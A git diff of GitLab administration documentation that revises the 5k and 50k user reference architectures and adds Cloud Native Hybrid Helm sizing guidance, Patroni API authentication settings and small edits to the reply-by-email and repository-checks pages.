Supported modifications for lower user counts (HA) diff --git a/doc/administration/reference_architectures/50k_users.md b/doc/administration/reference_architectures/50k_users.md index b3324cb75fb..766f94f6c53 100644 --- a/doc/administration/reference_architectures/50k_users.md +++ b/doc/administration/reference_architectures/50k_users.md @@ -94,7 +94,6 @@ cloud "**Object Storage**" as object_storage #white elb -[#6a9be7]-> gitlab elb -[#6a9be7]--> monitor -gitlab -[#32CD32]> sidekiq gitlab -[#32CD32]--> ilb gitlab -[#32CD32]-> object_storage gitlab -[#32CD32]---> redis @@ -608,8 +607,12 @@ in the second step, do not supply the `EXTERNAL_URL` value. # Replace POSTGRESQL_PASSWORD_HASH with a generated md5 value postgresql['sql_user_password'] = '<postgresql_password_hash>' + # Set up basic authentication for the Patroni API (use the same username/password in all nodes). + patroni['username'] = '<patroni_api_username>' + patroni['password'] = '<patroni_api_password>' + # Replace XXX.XXX.XXX.XXX/YY with Network Address - postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24) + postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24 127.0.0.1/32) # Set the network addresses that the exporters will listen on for monitoring node_exporter['listen_address'] = '0.0.0.0:9100' @@ -812,7 +815,7 @@ Managed Redis from cloud providers (such as AWS ElastiCache) will work. If these services support high availability, be sure it _isn't_ of the Redis Cluster type. Redis version 5.0 or higher is required, which is included with Omnibus GitLab packages starting with GitLab 13.0. Older Redis versions don't support an -optional count argument to SPOP, which is required for [Merge Trains](../../ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md). +optional count argument to SPOP, which is required for [Merge Trains](../../ci/pipelines/merge_trains.md). Note the Redis node's IP address or hostname, port, and password (if required). These will be necessary later when configuring the [GitLab application servers](#configure-gitlab-rails). @@ -872,7 +875,7 @@ a node and change its status from primary to replica (and vice versa). 'redis.addr' => 'redis://10.6.0.51:6379', 'redis.password' => 'redis-password-goes-here', } - + # Prevent database migrations from running on upgrade automatically gitlab_rails['auto_migrate'] = false ``` @@ -1425,7 +1428,7 @@ in the second step, do not supply the `EXTERNAL_URL` value. postgresql['sql_user_password'] = "<praefect_postgresql_password_hash>" # Replace XXX.XXX.XXX.XXX/YY with Network Address - postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24) + postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24 127.0.0.1/32) # Set the network addresses that the exporters will listen on for monitoring node_exporter['listen_address'] = '0.0.0.0:9100' @@ -1627,7 +1630,7 @@ the file of the same name on this server. If this is the first Omnibus node you 1. Praefect requires to run some database migrations, much like the main GitLab application. For this you should select **one Praefect node only to run the migrations**, AKA the _Deploy Node_. This node must be configured first before the others as follows: - + 1. In the `/etc/gitlab/gitlab.rb` file, change the `praefect['auto_migrate']` setting value from `false` to `true` 1. To ensure database migrations are only run during reconfigure and not automatically on upgrade, run: @@ -1635,7 +1638,7 @@ the file of the same name on this server. If this is the first Omnibus node you ```shell sudo touch /etc/gitlab/skip-auto-reconfigure ``` - + 1. [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect and to run the Praefect database migrations. @@ -1703,7 +1706,7 @@ On each node: # balancer. gitlab_rails['internal_api_url'] = 'https://gitlab.example.com' - # Gitaly + # Gitaly gitaly['enable'] = true # Make Gitaly accept connections on all network interfaces. You must use @@ -1929,7 +1932,7 @@ To configure the Sidekiq nodes, on each one: ## Set number of Sidekiq threads per queue process to the recommend number of 10 sidekiq['max_concurrency'] = 10 - # Monitoring + # Monitoring consul['enable'] = true consul['monitoring_service_discovery'] = true @@ -2373,10 +2376,194 @@ to use GitLab Pages, this currently [requires NFS](troubleshooting.md#gitlab-pag See how to [configure NFS](../nfs.md). WARNING: -From GitLab 14.0, enhancements and bug fixes for NFS for Git repositories will no longer be -considered and customer technical support will be considered out of scope. -[Read more about Gitaly and NFS](../gitaly/index.md#nfs-deprecation-notice) and -[the correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). +Engineering support for NFS for Git repositories is deprecated. Technical support is planned to be +unavailable from GitLab 15.0. No further enhancements are planned for this feature. + +Read: + +- The [Gitaly and NFS deprecation notice](../gitaly/index.md#nfs-deprecation-notice). +- About the [correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). + +## Cloud Native Hybrid reference architecture with Helm Charts (alternative) + +As an alternative approach, you can also run select components of GitLab as Cloud Native +in Kubernetes via our official [Helm Charts](https://docs.gitlab.com/charts/). +In this setup, we support running the equivalent of GitLab Rails and Sidekiq nodes +in a Kubernetes cluster, named Webservice and Sidekiq respectively. In addition, +the following other supporting services are supported: NGINX, Task Runner, Migrations, +Prometheus and Grafana. + +Hybrid installations leverage the benefits of both cloud native and traditional +compute deployments. With this, _stateless_ components can benefit from cloud native +workload management benefits while _stateful_ components are deployed in compute VMs +with Omnibus to benefit from increased permanence. + +NOTE: +This is an **advanced** setup. Running services in Kubernetes is well known +to be complex. **This setup is only recommended** if you have strong working +knowledge and experience in Kubernetes. The rest of this +section will assume this. + +### Cluster topology + +The following tables and diagram details the hybrid environment using the same formats +as the normal environment above. + +First starting with the components that run in Kubernetes. The recommendations at this +time use Google Cloud’s Kubernetes Engine (GKE) and associated machine types, but the memory +and CPU requirements should translate to most other providers. We hope to update this in the +future with further specific cloud provider details. + +| Service | Nodes(1) | Configuration | GCP | Allocatable CPUs and Memory | +|-------------------------------------------------------|----------|-------------------------|------------------|-----------------------------| +| Webservice | 16 | 32 vCPU, 28.8 GB memory | `n1-highcpu-32` | 510 vCPU, 472 GB memory | +| Sidekiq | 4 | 4 vCPU, 15 GB memory | `n1-standard-4` | 15.5 vCPU, 50 GB memory | +| Supporting services such as NGINX, Prometheus, etc. | 2 | 4 vCPU, 15 GB memory | `n1-standard-4` | 7.75 vCPU, 25 GB memory | + +<!-- Disable ordered list rule https://github.com/DavidAnson/markdownlint/blob/main/doc/Rules.md#md029---ordered-list-item-prefix --> +<!-- markdownlint-disable MD029 --> +1. Nodes configuration is shown as it is forced to ensure pod vcpu / memory ratios and avoid scaling during **performance testing**. + In production deployments there is no need to assign pods to nodes. A minimum of three nodes in three different availability zones is strongly recommended to align with resilient cloud architecture practices. +<!-- markdownlint-enable MD029 --> + +Next are the backend components that run on static compute VMs via Omnibus (or External PaaS +services where applicable): + +| Service | Nodes | Configuration | GCP | +|--------------------------------------------|-------|-------------------------|------------------| +| Consul(1) | 3 | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| PostgreSQL(1) | 3 | 32 vCPU, 120 GB memory | `n1-standard-32` | +| PgBouncer(1) | 3 | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| Internal load balancing node(3) | 1 | 8 vCPU, 7.2 GB memory | `n1-highcpu-8` | +| Redis - Cache(2) | 3 | 4 vCPU, 15 GB memory | `n1-standard-4` | +| Redis - Queues / Shared State(2) | 3 | 4 vCPU, 15 GB memory | `n1-standard-4` | +| Redis Sentinel - Cache(2) | 3 | 1 vCPU, 3.75 GB memory | `n1-standard-1` | +| Redis Sentinel - Queues / Shared State(2) | 3 | 1 vCPU, 3.75 GB memory | `n1-standard-1` | +| Gitaly | 3 | 64 vCPU, 240 GB memory | `n1-standard-64` | +| Praefect | 3 | 4 vCPU, 3.6 GB memory | `n1-highcpu-4` | +| Praefect PostgreSQL(1) | 1+ | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| Object storage(4) | n/a | n/a | n/a | + +<!-- Disable ordered list rule https://github.com/DavidAnson/markdownlint/blob/main/doc/Rules.md#md029---ordered-list-item-prefix --> +<!-- markdownlint-disable MD029 --> +1. Can be optionally run on reputable third-party external PaaS PostgreSQL solutions. Google Cloud SQL and AWS RDS are known to work, however Azure Database for PostgreSQL is [not recommended](https://gitlab.com/gitlab-org/quality/reference-architectures/-/issues/61) due to performance issues. Consul is primarily used for PostgreSQL high availability so can be ignored when using a PostgreSQL PaaS setup. However it is also used optionally by Prometheus for Omnibus auto host discovery. +2. Can be optionally run on reputable third-party external PaaS Redis solutions. Google Memorystore and AWS Elasticache are known to work. +3. Can be optionally run on reputable third-party load balancing services (LB PaaS). AWS ELB is known to work. +4. Should be run on reputable third party object storage (storage PaaS) for cloud implementations. Google Cloud Storage and AWS S3 are known to work. +<!-- markdownlint-enable MD029 --> + +NOTE: +For all PaaS solutions that involve configuring instances, it is strongly recommended to implement a minimum of three nodes in three different availability zones to align with resilient cloud architecture practices. + +```plantuml +@startuml 50k + +card "Kubernetes via Helm Charts" as kubernetes { + card "**External Load Balancer**" as elb #6a9be7 + + together { + collections "**Webservice** x16" as gitlab #32CD32 + collections "**Sidekiq** x4" as sidekiq #ff8dd1 + } + + card "**Prometheus + Grafana**" as monitor #7FFFD4 + card "**Supporting Services**" as support +} + +card "**Internal Load Balancer**" as ilb #9370DB +collections "**Consul** x3" as consul #e76a9b + +card "Gitaly Cluster" as gitaly_cluster { + collections "**Praefect** x3" as praefect #FF8C00 + collections "**Gitaly** x3" as gitaly #FF8C00 + card "**Praefect PostgreSQL***\n//Non fault-tolerant//" as praefect_postgres #FF8C00 + + praefect -[#FF8C00]-> gitaly + praefect -[#FF8C00]> praefect_postgres +} + +card "Database" as database { + collections "**PGBouncer** x3" as pgbouncer #4EA7FF + card "**PostgreSQL** (Primary)" as postgres_primary #4EA7FF + collections "**PostgreSQL** (Secondary) x2" as postgres_secondary #4EA7FF + + pgbouncer -[#4EA7FF]-> postgres_primary + postgres_primary .[#4EA7FF]> postgres_secondary +} + +card "redis" as redis { + collections "**Redis Persistent** x3" as redis_persistent #FF6347 + collections "**Redis Cache** x3" as redis_cache #FF6347 + collections "**Redis Persistent Sentinel** x3" as redis_persistent_sentinel #FF6347 + collections "**Redis Cache Sentinel** x3"as redis_cache_sentinel #FF6347 + + redis_persistent <.[#FF6347]- redis_persistent_sentinel + redis_cache <.[#FF6347]- redis_cache_sentinel +} + +cloud "**Object Storage**" as object_storage #white + +elb -[#6a9be7]-> gitlab +elb -[#6a9be7]-> monitor +elb -[hidden]-> support + +gitlab -[#32CD32]--> ilb +gitlab -[#32CD32]-> object_storage +gitlab -[#32CD32]---> redis +gitlab -[hidden]--> consul + +sidekiq -[#ff8dd1]--> ilb +sidekiq -[#ff8dd1]-> object_storage +sidekiq -[#ff8dd1]---> redis +sidekiq -[hidden]--> consul + +ilb -[#9370DB]-> gitaly_cluster +ilb -[#9370DB]-> database + +consul .[#e76a9b]-> database +consul .[#e76a9b]-> gitaly_cluster +consul .[#e76a9b,norank]--> redis + +monitor .[#7FFFD4]> consul +monitor .[#7FFFD4]-> database +monitor .[#7FFFD4]-> gitaly_cluster +monitor .[#7FFFD4,norank]--> redis +monitor .[#7FFFD4]> ilb +monitor .[#7FFFD4,norank]u--> elb + +@enduml +``` + +### Resource usage settings + +The following formulas help when calculating how many pods may be deployed within resource constraints. +The [50k reference architecture example values file](https://gitlab.com/gitlab-org/charts/gitlab/-/blob/master/examples/ref/50k.yaml) +documents how to apply the calculated configuration to the Helm Chart. + +#### Webservice + +Webservice pods typically need about 1 vCPU and 1.25 GB of memory _per worker_. +Each Webservice pod will consume roughly 4 vCPUs and 5 GB of memory using +the [recommended topology](#cluster-topology) because four worker processes +are created by default and each pod has other small processes running. + +For 50k users we recommend a total Puma worker count of around 320. +With the [provided recommendations](#cluster-topology) this allows the deployment of up to 80 +Webservice pods with 4 workers per pod and 5 pods per node. Expand available resources using +the ratio of 1 vCPU to 1.25 GB of memory _per each worker process_ for each additional +Webservice pod. + +For further information on resource usage, see the [Webservice resources](https://docs.gitlab.com/charts/charts/gitlab/webservice/#resources). + +#### Sidekiq + +Sidekiq pods should generally have 1 vCPU and 2 GB of memory. + +[The provided starting point](#cluster-topology) allows the deployment of up to +14 Sidekiq pods. Expand available resources using the 1 vCPU to 2GB memory +ratio for each additional pod. + +For further information on resource usage, see the [Sidekiq resources](https://docs.gitlab.com/charts/charts/gitlab/sidekiq/#resources). <div align="right"> <a type="button" class="btn btn-default" href="#setup-components"> diff --git a/doc/administration/reference_architectures/5k_users.md b/doc/administration/reference_architectures/5k_users.md index 9952df196c9..e57c4545b13 100644 --- a/doc/administration/reference_architectures/5k_users.md +++ b/doc/administration/reference_architectures/5k_users.md @@ -60,10 +60,7 @@ together { collections "**Sidekiq** x4" as sidekiq #ff8dd1 } -together { - card "**Prometheus + Grafana**" as monitor #7FFFD4 - collections "**Consul** x3" as consul #e76a9b -} +card "**Prometheus + Grafana**" as monitor #7FFFD4 card "Gitaly Cluster" as gitaly_cluster { collections "**Praefect** x3" as praefect #FF8C00 @@ -83,14 +80,15 @@ card "Database" as database { postgres_primary .[#4EA7FF]> postgres_secondary } -card "redis" as redis { - collections "**Redis Persistent** x3" as redis_persistent #FF6347 - collections "**Redis Cache** x3" as redis_cache #FF6347 - collections "**Redis Persistent Sentinel** x3" as redis_persistent_sentinel #FF6347 - collections "**Redis Cache Sentinel** x3"as redis_cache_sentinel #FF6347 +node "**Consul + Sentinel** x3" as consul_sentinel { + component Consul as consul #e76a9b + component Sentinel as sentinel #e6e727 +} - redis_persistent <.[#FF6347]- redis_persistent_sentinel - redis_cache <.[#FF6347]- redis_cache_sentinel +card "Redis" as redis { + collections "**Redis** x3" as redis_nodes #FF6347 + + redis_nodes <.[#FF6347]- sentinel } cloud "**Object Storage**" as object_storage #white @@ -98,7 +96,6 @@ cloud "**Object Storage**" as object_storage #white elb -[#6a9be7]-> gitlab elb -[#6a9be7]--> monitor -gitlab -[#32CD32]> sidekiq gitlab -[#32CD32]--> ilb gitlab -[#32CD32]-> object_storage gitlab -[#32CD32]---> redis @@ -432,7 +429,7 @@ services support high availability, be sure it is **not** the Redis Cluster type Redis version 5.0 or higher is required, as this is what ships with Omnibus GitLab packages starting with GitLab 13.0. Older Redis versions do not support an optional count argument to SPOP which is now required for -[Merge Trains](../../ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md). +[Merge Trains](../../ci/pipelines/merge_trains.md). Note the Redis node's IP address or hostname, port, and password (if required). These will be necessary when configuring the @@ -846,7 +843,7 @@ in the second step, do not supply the `EXTERNAL_URL` value. # Sets `max_replication_slots` to double the number of database nodes. # Patroni uses one extra slot per node when initiating the replication. patroni['postgresql']['max_replication_slots'] = 8 - + # Set `max_wal_senders` to one more than the number of replication slots in the cluster. # This is used to prevent replication from using up all of the # available database connections. @@ -873,8 +870,12 @@ in the second step, do not supply the `EXTERNAL_URL` value. # Replace POSTGRESQL_PASSWORD_HASH with a generated md5 value postgresql['sql_user_password'] = '<postgresql_password_hash>' + # Set up basic authentication for the Patroni API (use the same username/password in all nodes). + patroni['username'] = '<patroni_api_username>' + patroni['password'] = '<patroni_api_password>' + # Replace XXX.XXX.XXX.XXX/YY with Network Address - postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24) + postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24 127.0.0.1/32) # Set the network addresses that the exporters will listen on for monitoring node_exporter['listen_address'] = '0.0.0.0:9100' @@ -1118,7 +1119,7 @@ in the second step, do not supply the `EXTERNAL_URL` value. postgresql['sql_user_password'] = "<praefect_postgresql_password_hash>" # Replace XXX.XXX.XXX.XXX/YY with Network Address - postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24) + postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24 127.0.0.1/32) # Set the network addresses that the exporters will listen on for monitoring node_exporter['listen_address'] = '0.0.0.0:9100' @@ -1320,7 +1321,7 @@ the file of the same name on this server. If this is the first Omnibus node you 1. Praefect requires to run some database migrations, much like the main GitLab application. For this you should select **one Praefect node only to run the migrations**, AKA the _Deploy Node_. This node must be configured first before the others as follows: - + 1. In the `/etc/gitlab/gitlab.rb` file, change the `praefect['auto_migrate']` setting value from `false` to `true` 1. To ensure database migrations are only run during reconfigure and not automatically on upgrade, run: @@ -1328,7 +1329,7 @@ the file of the same name on this server. If this is the first Omnibus node you ```shell sudo touch /etc/gitlab/skip-auto-reconfigure ``` - + 1. [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect and to run the Praefect database migrations. @@ -2056,10 +2057,191 @@ to use GitLab Pages, this currently [requires NFS](troubleshooting.md#gitlab-pag See how to [configure NFS](../nfs.md). WARNING: -From GitLab 14.0, enhancements and bug fixes for NFS for Git repositories will no longer be -considered and customer technical support will be considered out of scope. -[Read more about Gitaly and NFS](../gitaly/index.md#nfs-deprecation-notice) and -[the correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). +Engineering support for NFS for Git repositories is deprecated. Technical support is planned to be +unavailable from GitLab 15.0. No further enhancements are planned for this feature. + +Read: + +- The [Gitaly and NFS deprecation notice](../gitaly/index.md#nfs-deprecation-notice). +- About the [correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). + +## Cloud Native Hybrid reference architecture with Helm Charts (alternative) + +As an alternative approach, you can also run select components of GitLab as Cloud Native +in Kubernetes via our official [Helm Charts](https://docs.gitlab.com/charts/). +In this setup, we support running the equivalent of GitLab Rails and Sidekiq nodes +in a Kubernetes cluster, named Webservice and Sidekiq respectively. In addition, +the following other supporting services are supported: NGINX, Task Runner, Migrations, +Prometheus and Grafana. + +Hybrid installations leverage the benefits of both cloud native and traditional +compute deployments. With this, _stateless_ components can benefit from cloud native +workload management benefits while _stateful_ components are deployed in compute VMs +with Omnibus to benefit from increased permanence. + +NOTE: +This is an **advanced** setup. Running services in Kubernetes is well known +to be complex. **This setup is only recommended** if you have strong working +knowledge and experience in Kubernetes. The rest of this +section will assume this. + +### Cluster topology + +The following tables and diagram details the hybrid environment using the same formats +as the normal environment above. + +First starting with the components that run in Kubernetes. The recommendations at this +time use Google Cloud’s Kubernetes Engine (GKE) and associated machine types, but the memory +and CPU requirements should translate to most other providers. We hope to update this in the +future with further specific cloud provider details. + +| Service | Nodes(1) | Configuration | GCP | Allocatable CPUs and Memory | +|-------------------------------------------------------|----------|-------------------------|------------------|-----------------------------| +| Webservice | 5 | 16 vCPU, 14.4 GB memory | `n1-highcpu-16` | 79.5 vCPU, 62 GB memory | +| Sidekiq | 3 | 4 vCPU, 15 GB memory | `n1-standard-4` | 11.8 vCPU, 38.9 GB memory | +| Supporting services such as NGINX, Prometheus, etc. | 2 | 2 vCPU, 7.5 GB memory | `n1-standard-2` | 3.9 vCPU, 11.8 GB memory | + +<!-- Disable ordered list rule https://github.com/DavidAnson/markdownlint/blob/main/doc/Rules.md#md029---ordered-list-item-prefix --> +<!-- markdownlint-disable MD029 --> +1. Nodes configuration is shown as it is forced to ensure pod vcpu / memory ratios and avoid scaling during **performance testing**. + In production deployments there is no need to assign pods to nodes. A minimum of three nodes in three different availability zones is strongly recommended to align with resilient cloud architecture practices. +<!-- markdownlint-enable MD029 --> + +Next are the backend components that run on static compute VMs via Omnibus (or External PaaS +services where applicable): + +| Service | Nodes | Configuration | GCP | +|--------------------------------------------|-------|-------------------------|------------------| +| Redis(2) | 3 | 2 vCPU, 7.5 GB memory | `n1-standard-2` | +| Consul(1) + Sentinel(2) | 3 | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| PostgreSQL(1) | 3 | 4 vCPU, 15 GB memory | `n1-standard-4` | +| PgBouncer(1) | 3 | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| Internal load balancing node(3) | 1 | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| Gitaly | 3 | 8 vCPU, 30 GB memory | `n1-standard-8` | +| Praefect | 3 | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| Praefect PostgreSQL(1) | 1+ | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| Object storage(4) | n/a | n/a | n/a | + +<!-- Disable ordered list rule https://github.com/DavidAnson/markdownlint/blob/main/doc/Rules.md#md029---ordered-list-item-prefix --> +<!-- markdownlint-disable MD029 --> +1. Can be optionally run on reputable third-party external PaaS PostgreSQL solutions. Google Cloud SQL and AWS RDS are known to work, however Azure Database for PostgreSQL is [not recommended](https://gitlab.com/gitlab-org/quality/reference-architectures/-/issues/61) due to performance issues. Consul is primarily used for PostgreSQL high availability so can be ignored when using a PostgreSQL PaaS setup. However it is also used optionally by Prometheus for Omnibus auto host discovery. +2. Can be optionally run on reputable third-party external PaaS Redis solutions. Google Memorystore and AWS Elasticache are known to work. +3. Can be optionally run on reputable third-party load balancing services (LB PaaS). AWS ELB is known to work. +4. Should be run on reputable third party object storage (storage PaaS) for cloud implementations. Google Cloud Storage and AWS S3 are known to work. +<!-- markdownlint-enable MD029 --> + +NOTE: +For all PaaS solutions that involve configuring instances, it is strongly recommended to implement a minimum of three nodes in three different availability zones to align with resilient cloud architecture practices. + +```plantuml +@startuml 5k + +card "Kubernetes via Helm Charts" as kubernetes { + card "**External Load Balancer**" as elb #6a9be7 + + together { + collections "**Webservice** x5" as gitlab #32CD32 + collections "**Sidekiq** x3" as sidekiq #ff8dd1 + } + + card "**Prometheus + Grafana**" as monitor #7FFFD4 + card "**Supporting Services**" as support +} + +card "**Internal Load Balancer**" as ilb #9370DB + +node "**Consul + Sentinel** x3" as consul_sentinel { + component Consul as consul #e76a9b + component Sentinel as sentinel #e6e727 +} + +card "Gitaly Cluster" as gitaly_cluster { + collections "**Praefect** x3" as praefect #FF8C00 + collections "**Gitaly** x3" as gitaly #FF8C00 + card "**Praefect PostgreSQL***\n//Non fault-tolerant//" as praefect_postgres #FF8C00 + + praefect -[#FF8C00]-> gitaly + praefect -[#FF8C00]> praefect_postgres +} + +card "Database" as database { + collections "**PGBouncer** x3" as pgbouncer #4EA7FF + card "**PostgreSQL** (Primary)" as postgres_primary #4EA7FF + collections "**PostgreSQL** (Secondary) x2" as postgres_secondary #4EA7FF + + pgbouncer -[#4EA7FF]-> postgres_primary + postgres_primary .[#4EA7FF]> postgres_secondary +} + +card "Redis" as redis { + collections "**Redis** x3" as redis_nodes #FF6347 + + redis_nodes <.[#FF6347]- sentinel +} + +cloud "**Object Storage**" as object_storage #white + +elb -[#6a9be7]-> gitlab +elb -[#6a9be7]-> monitor +elb -[hidden]-> support + +gitlab -[#32CD32]--> ilb +gitlab -[#32CD32]-> object_storage +gitlab -[#32CD32]---> redis +gitlab -[hidden]--> consul + +sidekiq -[#ff8dd1]--> ilb +sidekiq -[#ff8dd1]-> object_storage +sidekiq -[#ff8dd1]---> redis +sidekiq -[hidden]--> consul + +ilb -[#9370DB]-> gitaly_cluster +ilb -[#9370DB]-> database + +consul .[#e76a9b]-> database +consul .[#e76a9b]-> gitaly_cluster +consul .[#e76a9b,norank]--> redis + +monitor .[#7FFFD4]> consul +monitor .[#7FFFD4]-> database +monitor .[#7FFFD4]-> gitaly_cluster +monitor .[#7FFFD4,norank]--> redis +monitor .[#7FFFD4]> ilb +monitor .[#7FFFD4,norank]u--> elb + +@enduml +``` + +### Resource usage settings + +The following formulas help when calculating how many pods may be deployed within resource constraints. +The [5k reference architecture example values file](https://gitlab.com/gitlab-org/charts/gitlab/-/blob/master/examples/ref/5k.yaml) +documents how to apply the calculated configuration to the Helm Chart. + +#### Webservice + +Webservice pods typically need about 1 vCPU and 1.25 GB of memory _per worker_. +Each Webservice pod will consume roughly 4 vCPUs and 5 GB of memory using +the [recommended topology](#cluster-topology) because four worker processes +are created by default and each pod has other small processes running. + +For 5k users we recommend a total Puma worker count of around 40. +With the [provided recommendations](#cluster-topology) this allows the deployment of up to 10 +Webservice pods with 4 workers per pod and 2 pods per node. Expand available resources using +the ratio of 1 vCPU to 1.25 GB of memory _per each worker process_ for each additional +Webservice pod. + +For further information on resource usage, see the [Webservice resources](https://docs.gitlab.com/charts/charts/gitlab/webservice/#resources). + +#### Sidekiq + +Sidekiq pods should generally have 1 vCPU and 2 GB of memory. + +[The provided starting point](#cluster-topology) allows the deployment of up to +8 Sidekiq pods. Expand available resources using the 1 vCPU to 2GB memory +ratio for each additional pod. + +For further information on resource usage, see the [Sidekiq resources](https://docs.gitlab.com/charts/charts/gitlab/sidekiq/#resources). <div align="right"> <a type="button" class="btn btn-default" href="#setup-components"> diff --git a/doc/administration/reference_architectures/index.md b/doc/administration/reference_architectures/index.md index 49024365e30..22871f6ea8d 100644 --- a/doc/administration/reference_architectures/index.md +++ b/doc/administration/reference_architectures/index.md @@ -69,6 +69,13 @@ The following reference architectures are available: - [Up to 25,000 users](25k_users.md) - [Up to 50,000 users](50k_users.md) +The following Cloud Native Hybrid reference architectures, where select recommended components can be run in Kubernetes, are available: + +- [Up to 5,000 users](5k_users.md#cloud-native-hybrid-reference-architecture-with-helm-charts-alternative) +- [Up to 10,000 users](10k_users.md#cloud-native-hybrid-reference-architecture-with-helm-charts-alternative) +- [Up to 25,000 users](25k_users.md#cloud-native-hybrid-reference-architecture-with-helm-charts-alternative) +- [Up to 50,000 users](50k_users.md#cloud-native-hybrid-reference-architecture-with-helm-charts-alternative) + A GitLab [Premium or Ultimate](https://about.gitlab.com/pricing/#self-managed) license is required to get assistance from Support with troubleshooting the [2,000 users](2k_users.md) and higher reference architectures. @@ -163,7 +170,7 @@ a layer of complexity that will add challenges to finding out where potential issues might lie. The reference architectures use the official GitLab Linux packages (Omnibus -GitLab) to install and configure the various components (with one notable exception being the suggested select Cloud Native installation method described below). The components are +GitLab) or [Helm Charts](https://docs.gitlab.com/charts/) to install and configure the various components. The components are installed on separate machines (virtualized or bare metal), with machine hardware requirements listed in the "Configuration" column and equivalent VM standard sizes listed in GCP/AWS/Azure columns of each [available reference architecture](#available-reference-architectures). @@ -175,21 +182,10 @@ Other technologies, like [Docker swarm](https://docs.docker.com/engine/swarm/) are not officially supported, but can be implemented at your own risk. In that case, GitLab Support will not be able to help you. -### Configuring select components with Cloud Native Helm - -We also provide [Helm charts](https://docs.gitlab.com/charts/) as a Cloud Native installation -method for GitLab. For the reference architectures, select components can be set up in this -way as an alternative if so desired. +## Supported modifications for lower user count HA reference architectures -For these kind of setups we support using the charts in an [advanced configuration](https://docs.gitlab.com/charts/#advanced-configuration) -where stateful backend components, such as the database or Gitaly, are run externally - either -via Omnibus or reputable third party services. Note that we don't currently support running the -stateful components via Helm _at large scales_. +The reference architectures for user counts [3,000](3k_users.md) and up support High Availability (HA). -When designing these environments you should refer to the respective [Reference Architecture](#available-reference-architectures) -above for guidance on sizing. Components run via Helm would be similarly scaled to their Omnibus -specs, only translated into Kubernetes resources. +In the specific case you have the requirement to achieve HA but have a lower user count, select modifications to the [3,000 user](3k_users.md) architecture are supported. -For example, if you were to set up a 50k installation with the Rails nodes being run in Helm, -then the same amount of resources as given for Omnibus should be given to the Kubernetes -cluster with the Rails nodes broken down into a number of smaller Pods across that cluster. +For more details, [refer to this section in the architecture's documentation](3k_users.md#supported-modifications-for-lower-user-counts-ha). diff --git a/doc/administration/reference_architectures/troubleshooting.md b/doc/administration/reference_architectures/troubleshooting.md index 4b07cff7de2..61d9dfea2a2 100644 --- a/doc/administration/reference_architectures/troubleshooting.md +++ b/doc/administration/reference_architectures/troubleshooting.md @@ -207,7 +207,7 @@ To make sure your configuration is correct: ## Troubleshooting Gitaly For troubleshooting information, see Gitaly and Gitaly Cluster -[troubleshooting information](../gitaly/index.md). +[troubleshooting information](../gitaly/troubleshooting.md). ## Troubleshooting the GitLab Rails application diff --git a/doc/administration/reply_by_email.md b/doc/administration/reply_by_email.md index ebb9e086cb7..c249f48b768 100644 --- a/doc/administration/reply_by_email.md +++ b/doc/administration/reply_by_email.md @@ -4,9 +4,7 @@ group: Certify info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Reply by email - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/1173) in GitLab 8.0. +# Reply by email **(FREE SELF)** GitLab can be set up to allow users to comment on issues and merge requests by replying to notification emails. @@ -34,10 +32,10 @@ addition, this "reply key" is also added to the `References` header. When you reply to the notification email, your email client: -- sends the email to the `Reply-To` address it got from the notification email -- sets the `In-Reply-To` header to the value of the `Message-ID` header from the +- Sends the email to the `Reply-To` address it got from the notification email +- Sets the `In-Reply-To` header to the value of the `Message-ID` header from the notification email -- sets the `References` header to the value of the `Message-ID` plus the value of +- Sets the `References` header to the value of the `Message-ID` plus the value of the notification email's `References` header. ### GitLab receives your reply to the notification email @@ -45,8 +43,8 @@ When you reply to the notification email, your email client: When GitLab receives your reply, it looks for the "reply key" in the following headers, in this order: -1. the `To` header -1. the `References` header +1. `To` header +1. `References` header If it finds a reply key, it leaves your reply as a comment on the entity the notification was about (issue, merge request, commit...). diff --git a/doc/administration/repository_checks.md b/doc/administration/repository_checks.md index 869b1e7068f..ab203bb7993 100644 --- a/doc/administration/repository_checks.md +++ b/doc/administration/repository_checks.md @@ -5,57 +5,64 @@ info: "To determine the technical writer assigned to the Stage/Group associated type: reference --- -# Repository checks **(FREE)** +# Repository checks **(FREE SELF)** -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/3232) in GitLab 8.7. +You can use [`git fsck`](https://git-scm.com/docs/git-fsck) to verify the integrity of all data +committed to a repository. GitLab administrators can trigger this check for a project using the +GitLab UI: -Git has a built-in mechanism, [`git fsck`](https://git-scm.com/docs/git-fsck), to verify the -integrity of all data committed to a repository. GitLab administrators -can trigger such a check for a project via the project page under the -Admin Area. The checks run asynchronously so it may take a few minutes -before the check result is visible on the project Admin Area. If the -checks failed you can see their output on in the -[`repocheck.log` file.](logs.md#repochecklog) +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Overview > Projects**. +1. Select the project to check. +1. In the **Repository check** section, select **Trigger repository check**. + +The checks run asynchronously so it may take a few 